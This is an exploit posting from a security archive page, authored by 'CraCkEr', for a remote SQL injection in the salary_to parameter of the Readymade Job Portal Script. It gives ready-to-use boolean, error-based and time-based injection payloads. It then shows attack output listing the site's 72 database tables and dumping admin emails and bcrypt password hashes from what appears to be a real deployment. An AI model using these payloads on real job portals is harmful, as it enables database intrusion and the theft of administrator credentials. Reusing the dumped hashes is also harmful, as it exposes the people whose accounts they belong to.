exploit the possibilities
Home Files News &[SERVICES_TAB]About Contact Add New

Readymade Job Portal Script SQL Injection

Readymade Job Portal Script SQL Injection
Posted Aug 12, 2022
Authored by CraCkEr

Readymade Job Portal Script suffers from a remote SQL injection vulnerability. The researcher requested version information from the vendor while reporting the vulnerability but the company has been unresponsive.

tags | exploit, remote, sql injection
SHA-256 | a6f79aba16a61d0c089fb29f3e1ad6b313edcd13d455647fae5155843541bad1

Readymade Job Portal Script SQL Injection

Change Mirror Download
┌┌───────────────────────────────────────────────────────────────────────────────────────┐
││ C r a C k E r ┌┘
┌┘ T H E C R A C K O F E T E R N A L M I G H T ││
└───────────────────────────────────────────────────────────────────────────────────────┘┘

┌──── From The Ashes and Dust Rises An Unimaginable crack.... ────┐
┌┌───────────────────────────────────────────────────────────────────────────────────────┐
┌┘ [ Exploits ] ┌┘
└───────────────────────────────────────────────────────────────────────────────────────┘┘
: Author : CraCkEr │ │ :
│ Website : i-netsolution.com │ │ │
│ Vendor : i-Net Solution │ │ │
│ Software : Readymade Job Portal Script │ │ Job Portal is a website that serves │
│ Vuln Type: Remote SQL Injection │ │ as a bridge between employers │
│ Method : GET │ │ and job seekers │
│ Impact : Database Access │ │ │
│ │ │ │
│────────────────────────────────────────────┘ └─────────────────────────────────────────│
│ B4nks-NET irc.b4nks.tk #unix ┌┘
└───────────────────────────────────────────────────────────────────────────────────────┘┘
: :
│ Release Notes: │
│ ═════════════ │
│ Typically used for remotely exploitable vulnerabilities that can lead to │
│ system compromise. │
│ │
┌┌───────────────────────────────────────────────────────────────────────────────────────┐
┌┘ ┌┘
└───────────────────────────────────────────────────────────────────────────────────────┘┘

Greets:

Phr33k , NK, GoldenX, Wehla, Cap, ZARAGAGA, DarkCatSpace, R0ot, KnG, Centerk
loool, DevS, Dark-Gost, Carlos132sp, ProGenius, bomb, fjear, H3LLB0Y, chamanwal, ix7

CryptoJob (Twitter) twitter.com/CryptozJob

┌┌───────────────────────────────────────────────────────────────────────────────────────┐
┌┘ © CraCkEr 2022 ┌┘
└───────────────────────────────────────────────────────────────────────────────────────┘┘


GET parameter 'salary_to' is vulnerable.

---
Parameter: salary_to (GET)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: search=&salary_from=222&salary_to=333) AND 3040=3040 AND (4873=4873

Type: error-based
Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
Payload: search=&salary_from=222&salary_to=333) AND (SELECT 3022 FROM(SELECT COUNT(*),CONCAT(0x71706a7671,(SELECT (ELT(3022=3022,1))),0x7162716271,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a) AND (1802=1802

Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: search=&salary_from=222&salary_to=333) AND (SELECT 5992 FROM (SELECT(SLEEP(10)))wrGn) AND (8437=8437
---

[+] Starting the Attack


[INFO] the back-end DBMS is MySQL
web application technology: Apache
back-end DBMS: MySQL >= 5.0 (MariaDB fork)


[INFO] fetching current database
current database: 'theminsall_jobportal_db'


[INFO] fetching tables for database: 'theminsall_jobportal_db'

Database: theminsall_jobportal_db
[72 tables]
+----------------------------------+
| admin_password_resets |
| admins |
| applicant_messages |
| blog_categories |
| blogs |
| career_levels |
| cities |
| cms |
| cms_content |
| companies |
| company_messages |
| company_password_resets |
| contact_messages |
| countries |
| countries_details |
| degree_levels |
| degree_types |
| failed_jobs |
| faqs |
| favourite_applicants |
| favourites_company |
| favourites_job |
| functional_areas |
| genders |
| industries |
| job_alerts |
| job_apply |
| job_apply_rejected |
| job_experiences |
| job_shifts |
| job_skills |
| job_titles |
| job_types |
| jobs |
| language_levels |
| languages |
| major_subjects |
| manage_job_skills |
| marital_statuses |
| migrations |
| ownership_types |
| packages |
| password_resets |
| payu_transactions |
| profile_cvs |
| profile_education_major_subjects |
| profile_educations |
| profile_experiences |
| profile_languages |
| profile_projects |
| profile_skills |
| profile_summaries |
| queue_jobs |
| report_abuse_company_messages |
| report_abuse_messages |
| result_types |
| roles |
| salary_periods |
| send_to_friend_messages |
| seo |
| site_settings |
| sliders |
| states |
| subscriptions |
| testimonials |
| unlocked_users |
| user_messages |
| users |
| videos |
| widget_pages |
| widgets |
| widgets_data |
+----------------------------------+


[INFO] fetching columns for table 'admins' in database 'theminsall_jobportal_db'

Database: theminsall_jobportal_db
Table: admins
[8 columns]
+----------------+------------------+
| Column | Type |
+----------------+------------------+
| created_at | timestamp |
| email | varchar(191) |
| id | int(10) unsigned |
| name | varchar(191) |
| password | varchar(191) |
| remember_token | varchar(100) |
| role_id | int(11) |
| updated_at | timestamp |
+----------------+------------------+


[INFO] fetching entries of column(s) 'email,id,name,password' for table 'admins' in database 'theminsall_jobportal_db'

Database: theminsall_jobportal_db
Table: admins
[3 entries]
+----+--------------------+--------------------------------------------------------------+-----------+
| id | email | password | name |
+----+--------------------+--------------------------------------------------------------+-----------+
| 3 | buyer@buyer.com | $2y$10$47ig/2wfYDc6EVg0iVnvp.l.jC0APqEVUjR7P6PFYTEhbNFzHPJ66 | Buyer |
| 4 | sub@jobsportal.com | $2y$10$uxtmaI.4Xrb3EEaLW6uvBuOKXyWCNtZ05pQFMwd6Jd1G0k9ZlKV/C | Sub Admin |
| 5 | admin@gmail.com | $2y$10$AvprFLS9PQXUs.3QVwyYZejm4FVYlKM02.nykVF.dVxS9D82I8ZLG | Admin |
+----+--------------------+--------------------------------------------------------------+-----------+
Possible Algorithms: bcrypt $2*$, Blowfish (Unix)


[-] Done

Login or Register to add favorites

File Archive:

October 2022

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Oct 1st
    10 Files
  • 2
    Oct 2nd
    0 Files
  • 3
    Oct 3rd
    12 Files
  • 4
    Oct 4th
    15 Files
  • 5
    Oct 5th
    0 Files
  • 6
    Oct 6th
    0 Files
  • 7
    Oct 7th
    0 Files
  • 8
    Oct 8th
    0 Files
  • 9
    Oct 9th
    0 Files
  • 10
    Oct 10th
    0 Files
  • 11
    Oct 11th
    0 Files
  • 12
    Oct 12th
    0 Files
  • 13
    Oct 13th
    0 Files
  • 14
    Oct 14th
    0 Files
  • 15
    Oct 15th
    0 Files
  • 16
    Oct 16th
    0 Files
  • 17
    Oct 17th
    0 Files
  • 18
    Oct 18th
    0 Files
  • 19
    Oct 19th
    0 Files
  • 20
    Oct 20th
    0 Files
  • 21
    Oct 21st
    0 Files
  • 22
    Oct 22nd
    0 Files
  • 23
    Oct 23rd
    0 Files
  • 24
    Oct 24th
    0 Files
  • 25
    Oct 25th
    0 Files
  • 26
    Oct 26th
    0 Files
  • 27
    Oct 27th
    0 Files
  • 28
    Oct 28th
    0 Files
  • 29
    Oct 29th
    0 Files
  • 30
    Oct 30th
    0 Files
  • 31
    Oct 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2022 Packet Storm. All rights reserved.

Hosting By
Rokasec
close